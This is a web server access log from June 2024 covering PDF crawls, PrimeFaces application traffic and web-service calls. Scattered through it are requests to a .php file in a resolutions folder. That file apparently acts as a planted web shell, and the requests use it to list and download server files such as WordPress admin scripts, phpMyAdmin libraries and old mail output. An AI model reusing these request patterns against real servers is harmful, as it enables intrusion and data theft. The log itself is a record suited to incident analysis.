201.245.192.253 - - [29/Jun/2024:09:40:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:09:40:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3425.pdf HTTP/1.1" 200 467200
66.249.66.12 - - [29/Jun/2024:09:40:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5016.pdf HTTP/1.1" 200 510557
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 59232
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:21 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:40:22 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 80997
186.29.33.66 - - [29/Jun/2024:09:40:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:09:38:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.181 - - [29/Jun/2024:09:40:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0323.pdf HTTP/1.1" 200 500108
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 59446
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
47.128.122.194 - - [29/Jun/2024:09:40:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=php1A27.tmp&ft=download HTTP/1.1" 200 48354
186.29.33.66 - - [29/Jun/2024:09:40:40 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:40:44 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 45267
186.29.33.66 - - [29/Jun/2024:09:40:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:40:49 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1779
186.29.33.66 - - [29/Jun/2024:09:40:52 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1784
201.245.192.253 - - [29/Jun/2024:09:40:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.193 - - [29/Jun/2024:09:40:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page23.swf&ft=download HTTP/1.1" 200 133232
186.29.33.66 - - [29/Jun/2024:09:41:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1783
66.249.66.11 - - [29/Jun/2024:09:41:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20151-200/2002RES163.tif HTTP/1.1" 200 57016
186.29.33.66 - - [29/Jun/2024:09:41:05 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 5102
186.29.33.66 - - [29/Jun/2024:09:41:06 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1779
66.249.66.12 - - [29/Jun/2024:09:41:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4765.pdf HTTP/1.1" 200 385488
47.128.113.213 - - [29/Jun/2024:09:41:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page35.swf&ft=download HTTP/1.1" 200 20897
172.22.2.4 - - [29/Jun/2024:09:39:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
47.128.18.3 - - [29/Jun/2024:09:41:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=gallery.min.js&ft=download HTTP/1.1" 200 3765
40.77.202.157 - - [29/Jun/2024:09:41:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.29.33.66 - - [29/Jun/2024:09:41:38 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 59535
186.29.33.66 - - [29/Jun/2024:09:41:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:39 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:39 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:41:43 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 80997
186.29.33.66 - - [29/Jun/2024:09:41:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:44 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
186.29.33.66 - - [29/Jun/2024:09:41:44 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
216.245.221.92 - - [29/Jun/2024:09:41:50 -0500] "HEAD / HTTP/1.1" 200 -
47.128.18.240 - - [29/Jun/2024:09:41:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=sanitizing.lib.php&ft=download HTTP/1.1" 200 4819
186.29.33.66 - - [29/Jun/2024:09:41:55 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 59518
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:41:56 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
201.245.192.253 - - [29/Jun/2024:09:41:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:41:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.60.208 - - [29/Jun/2024:09:42:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=admin.php&ft=download HTTP/1.1" 200 10730
186.29.33.66 - - [29/Jun/2024:09:42:18 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 45323
186.29.33.66 - - [29/Jun/2024:09:42:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:42:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:09:42:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0318.pdf HTTP/1.1" 200 339168
186.29.33.66 - - [29/Jun/2024:09:42:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:42:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:42:22 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2141
47.128.60.155 - - [29/Jun/2024:09:42:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4022.pdf&ft=download&white=1 HTTP/1.1" 200 179879
66.249.66.12 - - [29/Jun/2024:09:42:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0391.pdf HTTP/1.1" 200 334005
66.249.66.11 - - [29/Jun/2024:09:42:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0680.pdf HTTP/1.1" 200 856220
47.128.16.74 - - [29/Jun/2024:09:42:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4611.pdf&ft=download HTTP/1.1" 200 356007
47.128.22.173 - - [29/Jun/2024:09:42:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo&f=mercury_stop.bat&ft=download HTTP/1.1" 200 60
201.245.192.253 - - [29/Jun/2024:09:42:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:09:42:59 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2336
186.29.33.66 - - [29/Jun/2024:09:43:00 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2145
186.29.33.66 - - [29/Jun/2024:09:43:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2336
47.128.123.182 - - [29/Jun/2024:09:43:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150605-2225-686000.txt&ft=download HTTP/1.1" 200 2967
66.249.66.13 - - [29/Jun/2024:09:43:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2530.pdf HTTP/1.1" 200 728926
186.29.33.66 - - [29/Jun/2024:09:43:30 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1794
47.128.25.247 - - [29/Jun/2024:09:43:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Ccirculares%5C&f=3-2011-SDA.pdf&ft=download HTTP/1.1" 200 20129
47.128.112.148 - - [29/Jun/2024:09:43:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000234.tif&ft=download HTTP/1.1" 200 20131
201.245.192.253 - - [29/Jun/2024:09:43:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.29.33.66 - - [29/Jun/2024:09:43:57 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 59621
186.29.33.66 - - [29/Jun/2024:09:43:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:43:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:43:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:43:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:09:43:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:09:43:58 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:43:59 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:44:01 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 80997
186.29.33.66 - - [29/Jun/2024:09:44:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
186.29.33.66 - - [29/Jun/2024:09:44:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 59324
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:11 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:09:44:11 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-046-99.docx HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:11 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
66.249.66.12 - - [29/Jun/2024:09:44:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1042.pdf HTTP/1.1" 200 367509
66.249.66.12 - - [29/Jun/2024:09:44:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2665.pdf HTTP/1.1" 200 409388
186.29.33.66 - - [29/Jun/2024:09:44:23 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 45298
186.29.33.66 - - [29/Jun/2024:09:44:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.112.19 - - [29/Jun/2024:09:44:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006&f=0066.pdf&ft=download HTTP/1.1" 200 180475
47.128.34.107 - - [29/Jun/2024:09:44:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=media.php&ft=download HTTP/1.1" 200 118400
186.29.33.66 - - [29/Jun/2024:09:44:27 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2441
186.29.33.66 - - [29/Jun/2024:09:44:28 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2268
186.29.33.66 - - [29/Jun/2024:09:44:35 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1620
186.29.33.66 - - [29/Jun/2024:09:44:42 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1821
47.128.112.139 - - [29/Jun/2024:09:44:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0794.pdf&ft=download HTTP/1.1" 200 470695
186.29.33.66 - - [29/Jun/2024:09:44:43 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1821
66.249.66.12 - - [29/Jun/2024:09:44:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%2020 HTTP/1.1" 404 1018
66.249.66.11 - - [29/Jun/2024:09:44:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0397.pdf HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:45 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:44:52 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1816
